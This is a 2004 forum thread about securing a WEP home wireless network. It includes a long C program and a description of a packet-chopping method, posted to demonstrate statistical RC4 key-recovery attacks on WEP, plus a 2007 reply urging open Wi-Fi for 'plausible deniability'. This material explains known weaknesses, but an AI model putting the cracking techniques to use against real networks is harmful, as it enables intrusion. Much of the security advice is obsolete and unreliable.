Need security pointers

Need security pointers

Postby audiboy90 » Wed Jul 28, 2004 8:49 pm

What would you guys recommend to me as far a securing my wireless home network? I am running Mac OS 10.3.3 with an airport card and a linksys BEF11S4W router. I have a 64-bit WEP encrypted password but do not feel that this is sufficient by any means. Software, hardware, I do not really mind. But I am a college student and on a budget. Thanks.
audiboy90
 
Posts: 6
Joined: Thu May 13, 2004 5:24 pm
Location: Northern CA

Postby Barry » Wed Jul 28, 2004 9:32 pm

If you can, go 128bit and turn on the firewall on, on your mac. Use mac address authintication(that's not spelled right).
Never do anything you don't want to explain to the paramedics.
User avatar
Barry
 
Posts: 5713
Joined: Sat Dec 28, 2002 11:10 pm
Location: Ohio

Postby audiboy90 » Thu Jul 29, 2004 12:11 am

Ok now when I was having trouble with my WEP and getting the $ before it, Thorn told me to use open authentication. I am confused as to what is what and could use a little help here. Thanks.
audiboy90
 
Posts: 6
Joined: Thu May 13, 2004 5:24 pm
Location: Northern CA

Postby wrzwaldo » Thu Jul 29, 2004 6:09 am

There are several good articles on the web describing this. Do a google search and read away.
wrzwaldo
 
Posts: 8995
Joined: Sun Dec 14, 2003 12:43 pm

Postby Starpoint » Thu Jul 29, 2004 5:36 pm

audiboy90 wrote:What would you guys recommend to me as far a securing my wireless home network? I am running Mac OS 10.3.3 with an airport card and a linksys BEF11S4W router. I have a 64-bit WEP encrypted password but do not feel that this is sufficient by any means. Software, hardware, I do not really mind. But I am a college student and on a budget. Thanks.



Set the WEP key to the highest you can, change the SSID word to something different, AFTER you turn off its broadcast. If the router supports it, switch to MAC Address Authentication. What that means is only MAC address's entered into the router can use the router for intra and internet access etc..
Also if you have DHCP ON, you might want limit the IP pool to cover your computers and nothing more.. aka set the DHCP IP pool to a small number of IP's prefferably to how many PC's you have.

There are truly open wireless places out there but they made that choice and accept the responsibility of doing so.... you do not wanna be the onramp for some spammer, hacker, or worse..
Against the run of the mill, static as it seems

We break the surface tension with our wild kinetic dreams
Curves and lines -- of grand designs...


Tonight's movie "Soylent Green" has been brought to you by our sponsor - Waste Management

My mind is like a Steel trap - Rusty and Illegal in most states
User avatar
Starpoint
 
Posts: 2539
Joined: Fri Apr 18, 2003 4:47 pm
Location: Houston

Postby audiboy90 » Fri Aug 06, 2004 2:46 pm

What WEP default key should I be using for maximum security, 1, 2, 3, or 4?
audiboy90
 
Posts: 6
Joined: Thu May 13, 2004 5:24 pm
Location: Northern CA

Postby Barry » Fri Aug 06, 2004 3:10 pm

I don't think it matters.
Never do anything you don't want to explain to the paramedics.
User avatar
Barry
 
Posts: 5713
Joined: Sat Dec 28, 2002 11:10 pm
Location: Ohio

Postby Thorn » Fri Aug 06, 2004 3:18 pm

audiboy90 wrote:What WEP default key should I be using for maximum security, 1, 2, 3, or 4?

Default keys are usually a bad idea, for the simple reason that they are known. You're much better off using custom keys.
Thorn
Stop the TSA now! Boycott the airlines.
Thorn
 
Posts: 10340
Joined: Sat Apr 13, 2002 3:00 am
Location: Villa Straylight

Postby KoreK » Fri Aug 06, 2004 4:25 pm

I don't want to disappoint you, but if you are using wep, and somebody wants to screw you, he won't have much trouble. WEP is broken (officially since 2001). WEP-64 with a passphrase is even worse, since it's not even 40-bit security (easy brute force, 90 seconds on a PII-233, according to the README in Tim Newsham's wep_util). WEP-64 in hex can be brute-forced (day-days?). WEP-128 can not be brute-forced, nevertheless WEP has so many holes, that cracking it takes minutes/hours, depending on the tools/conditions. For example, if you are using P2P (ie lot of traffic), it will be crackable in less than a day. If the attacker generates a lot of traffic (wnet), it will be crackable in a few hours. You can configure WEP to use 4 keys, rotating them, nevertheless your solution is still broken. Answer is WPA, which means new card/new access point, or some IPsec/VPN solution, which also means new hardware. Do use WEP (13-byte hex key - passphrases generally don't work), if you don't have a choice, nevertheless never consider your link safe.

Authentification method should be open-system. As you can guess, WEP shared-key authentification is also broken. It gives attacker a simple way to inject any kind of traffic on your wireless network (wepwedgie). Not that it really matters, since as I mentionned somewhere above, WEP is broken.

MAC address authentification is commonly known as "MAC address filtering". Kismet or ethereal will get you the MAC connected to an AP.

SSID cloaking is pretty useless. Waiting for a new connection, or simply sending a Dissassociate frame will reveal the SSID. Only nice thing about it, is that Windows XP Wireless Configuration for Zeros doesn't like it...

Of the three measures, WEP is probably the least weak (since it requires more than a bit of sniffing around).

Post-edit: Removed a word. BTW don't forget to change the AP default password (admin).
User avatar
KoreK
 
Posts: 102
Joined: Wed Jul 21, 2004 5:25 pm

Postby Thorn » Fri Aug 06, 2004 5:40 pm

WEP is not as bad as the nay-sayers would have you believe. It is hardly a great encryption method, but it takes a fair amount of traffic (~4GB) to break it, and the some packets have to be "weak" or "interesting" packets. Most modern firmware eliminates such packets, so it's not really a problem unless you have old firmware and a lot a traffic.
Thorn
Stop the TSA now! Boycott the airlines.
Thorn
 
Posts: 10340
Joined: Sat Apr 13, 2002 3:00 am
Location: Villa Straylight

Postby KoreK » Fri Aug 06, 2004 6:51 pm

I got this half-baked cracker, which sometimes can crack wep with less 100,000 IVs. There was a post quite while on netstumbler with a reference to 13% cases. Reinjection greatly speeds up the process (if the users are not using p2p). WEP is really bad. It's just that the tools haven't been made/released. Let's say 200000 IVs are necessary + injection tool (500 packet/s, packets are 100byte long): less than 7minutes/20Megs.

Two flaws I have never seen discussed:
Chopping:
Take a WEP packet. Chop off the last byte. The CRC/ICV is broken. Now if the last byte was 0, you xor last the last 4 bytes with a certain value and the CRC will become valid again. Retransmit the packet. Does it get through? If not, then if the last byte is 1...

What FMS conveniently forgot to say/Demo of other statistical flaws of WEP:
Code: Select all
/* main.c
   Compile with:
   gcc -o main main.c
   Use:
   ./main <byte_number>
   collects statistics for the <byte_number>th byte of the rc4 key
   (3 for the first byte of the WEP-key,...) 

   Variable p gives the byte to attack in the key K
   Description of the output:
   * Value of the key
   * Number of times attack 1 worked (% of the total)
   * Number of times attack 2 worked (% of when detection was effective,
     % of the total)
   * Number of times attack 3 worked (% of the total)
   * ...
   * inverted attack!

   Attack 1 [FMS] is part stable/part unstable, so it sometimes gives
   false positive.
   Attack 2 is consistently stable.
   Attack 3 is unstable: False positive/negative appear from time to time
   (it doesn't work on p=3, works on p=4 (24%!) except there is a false
   positive (18%), works correctly on p=5 (22%)/no false positive)
   Attack 4 and 5 (5%) are unstable, but not as much as 3.

   Attack 6 is an "inverted attack". It helps weeding out guesses.
   Worst case should be like at most 2 detections for 256000 IVs or
   less, 3 for 256000-512000, to be adjusted... Quite useful to get
   rid of false positives.

   FMS Attack gets more and more samples as p increases, so other attacks
   are useful for cracking wep with as few IV's as possible.

*/

#include <stdio.h>
#include <stdlib.h>

void swap(int *a,int *b)
{
    int c;
    c=*a;
    *a=*b;
    *b=c;
}

int main(int argc,char **argv)
{
    unsigned int i,j,o1,o2,tmp,jp,p;
    unsigned int S[256];
//    unsigned int K[16]={0x00,0x00,0x00,0x45,0x15,0xa1,0x42,0x96,
//         0x45,0x23,0x53,0x53,0x56,0x16,0x44,0x32};
//    unsigned int K[16]={0x00,0x00,0x00,0x1f,0x58,0xa1,0xb2,0x86,
//         0x45,0x13,0x53,0x6e,0xa6,0x16,0x84,0xc2};
    unsigned int K[16]={0x00,0x00,0x00,0x1f,0x58,0xa1,0xb2,0x86,
         0x04,0x13,0x53,0x6e,0xa6,0x16,0x84,0xc2};
    int stat1[256],tstat1;
    int stat2[256],pstat2[256],tstat2;
    int stat3[256],tstat3;
    int stat4[256],tstat4;
    int stat5[256],tstat5;
    int stat6[256];

    if (argc>1) p=atoi(argv[1]);
    else p=3;

    for (i=0; i<256; i++) {
   stat1[i]=0;
   stat2[i]=0;
   pstat2[i]=0;
   stat3[i]=0;
   stat4[i]=0;
   stat5[i]=0;
   stat6[i]=0;
    }

    for (K[0]=0; K[0]<256; K[0]++)
   for (K[1]=0; K[1]<256; K[1]++)
       for (K[2]=0; K[2]<256; K[2]++) {
      // first get the data
      for (i=0; i<256; i++) S[i]=i;
      for (i=0,j=0; i<256; i++) {
          j=(j+K[i & 0x0f]+S[i]) & 0xff;
          swap(S+i,S+j);
      }
      i=1;
      j=S[1];
      tmp=(S[i]+S[j]) & 0xff;
      swap(S+i,S+j);
      o1=S[tmp];
      i=2;
      j=(j+S[2]) & 0xff;
      tmp=(S[i]+S[j]) & 0xff;
      swap(S+i,S+j);
      o2=S[tmp];

      // then do the attacks
      for (i=0; i<256; i++) S[i]=i;
      for (i=0,j=0; i<p; i++) {
          j=(j+K[i & 0x0f]+S[i]) & 0xff;
          swap(S+i,S+j);
      }
        
      // first type of attack FMS 5%
      if ((S[1] < p) && ((S[1]+S[S[1]]) == p)) {
          jp=o1;
          stat1[(jp-j-S[p]) & 0xff]++;
      }

      // second type of attack 13%
      if (S[1] == p) {
          for (jp=0; S[jp]!=0; jp++);
          if (o1 == p) {
         stat2[(jp-j-S[p]) & 0xff]++;
          }
          // for statistical purposes
          pstat2[(jp-j-S[p]) & 0xff]++;
      }

      // another one
      if ((o2 == 0) && (S[p] == 0) && (S[2] != 0)) {
          stat3[(2-j-S[p]) & 0xff]++;
      }
      
      // and two more (well there are still about 10 of 'em left:)
      if ((S[1] > p) && (((S[2]+S[1]-p) & 0xff) == 0)) {
          if (o2 == S[1]) {
         for (jp=0; S[jp] != ((S[1]-S[2]) & 0xff); jp++);
         if ((jp!=1) && (jp!=2)) stat4[(jp-j-S[p]) & 0xff]++;
          }
          else if (o2 == ((2-S[2]) & 0xff)) {
         for (jp=0; S[jp] != o2; jp++);
         if ((jp!=1) && (jp!=2)) stat5[(jp-j-S[p]) & 0xff]++;
          }
      }

      // inverted attack
      if (S[2] == 0) {
          if ((S[1] == 2) && (o1 == 2)) {
         stat6[(1-j-S[p]) & 0xff]++;
         stat6[(2-j-S[p]) & 0xff]++;
          }
          else if (o2==0) {
         stat6[(2-j-S[p]) & 0xff]++;
          }
      }
      if ((S[1] == 1) && (o1 == S[2])) {
          stat6[(1-j-S[p]) & 0xff]++;
          stat6[(2-j-S[p]) & 0xff]++;
      }
      if ((S[1] == 0) && (S[0] == 1) && (o1 == 1)) {
          stat6[(-j-S[p]) & 0xff]++;
          stat6[(1-j-S[p]) & 0xff]++;
      }

      if ((K[1]==0) && (K[2]==0)) fprintf(stderr,".");

       }

    fprintf(stderr,"\n");
         
    tstat1=0;
    tstat2=0;
    tstat3=0;
    tstat4=0;
    tstat5=0;
    for (i=0 ; i<256 ;i++) {
   tstat1+=stat1[i];
   tstat2+=stat2[i];
   tstat3+=stat3[i];
   tstat4+=stat4[i];
   tstat5+=stat5[i];
    }
   
    for (i=0; i<256; i++)
   printf("0x%02x: %3d(%4.1f%%) %2d(%4.1f%%-%4.1f%%) "
          "%3d(%4.1f%%) %2d(%4.1f%%) %2d(%4.1f%%) %5d(%s)\n",i,
          stat1[i],(100.0*stat1[i])/tstat1,
          stat2[i],(100.0*stat2[i])/pstat2[i],(100.0*stat2[i])/tstat2,
          stat3[i],(100.0*stat3[i])/tstat3,
          stat4[i],(100.0*stat4[i])/tstat4,
          stat5[i],(100.0*stat5[i])/tstat5,
          stat6[i],(stat6[i] < 32 ? "possible" : "impossible"));

    return 0;

}
User avatar
KoreK
 
Posts: 102
Joined: Wed Jul 21, 2004 5:25 pm

Postby wrzwaldo » Fri Aug 06, 2004 6:57 pm

Is that based on the WEP key never changing? What about low use networks with the key changed monthly/weekly/daily? I would suspect that on my wireless the WEP would possibly be cracked just about the same time I change the WEP key. Of course there are still a few what ifs.
wrzwaldo
 
Posts: 8995
Joined: Sun Dec 14, 2003 12:43 pm

Postby KoreK » Fri Aug 06, 2004 8:29 pm

wrzwaldo wrote:Is that based on the WEP key never changing? What about low use networks with the key changed monthly/weekly/daily? I would suspect that on my wireless the WEP would possibly be cracked just about the same time I change the WEP key. Of course there are still a few what ifs.

If I move my lame arse, if I decide to crack your WEP key, if some mild conditions are met (for example two clients on the AP/a few encrypted packet), then there is a quite high probability that I can crack your WEP key under an hour, there is a lower probability that I can crack your WEP key under 30 minutes, and (maybe with a bit of luck, or is it wishful thinking) there is still a non-zero probability that I can crack your WEP key under 10 minutes. As long as you don't change it. That's my estimation of WEP security. Ain't theory great...
User avatar
KoreK
 
Posts: 102
Joined: Wed Jul 21, 2004 5:25 pm

Postby sumatra » Tue May 01, 2007 2:00 am

audiboy90 wrote:What would you guys recommend to me as far a securing my wireless home network? I am running Mac OS 10.3.3 with an airport card and a linksys BEF11S4W router. I have a 64-bit WEP encrypted password but do not feel that this is sufficient by any means. Software, hardware, I do not really mind. But I am a college student and on a budget. Thanks.



I would recommend leaving your wireless traffic unencrypted. This gives you plausible deniability for any P2P "violations". Anything sensitive you are sending over the internet should be already encrypted anyway, so an open wireless channel will not change that.
sumatra
Mini Stumbler
 
Posts: 1
Joined: Tue May 01, 2007 1:56 am

Postby itsnotme » Tue May 01, 2007 2:42 am

sumatra wrote:I would recommend leaving your wireless traffic unencrypted. This gives you plausible deniability for any P2P "violations". Anything sensitive you are sending over the internet should be already encrypted anyway, so an open wireless channel will not change that.


Did you look at the date of the last post? I think they stopped caring back in 2004.

Read the Welcome Desk and look at the rules and pay special attention to #4.
User avatar
itsnotme
 
Posts: 1074
Joined: Wed Sep 04, 2002 10:19 pm
Location: Somewhere below Lake Ontario

Next

Return to Mac OS

Who is online

Users browsing this forum: No registered users and 1 guest

cron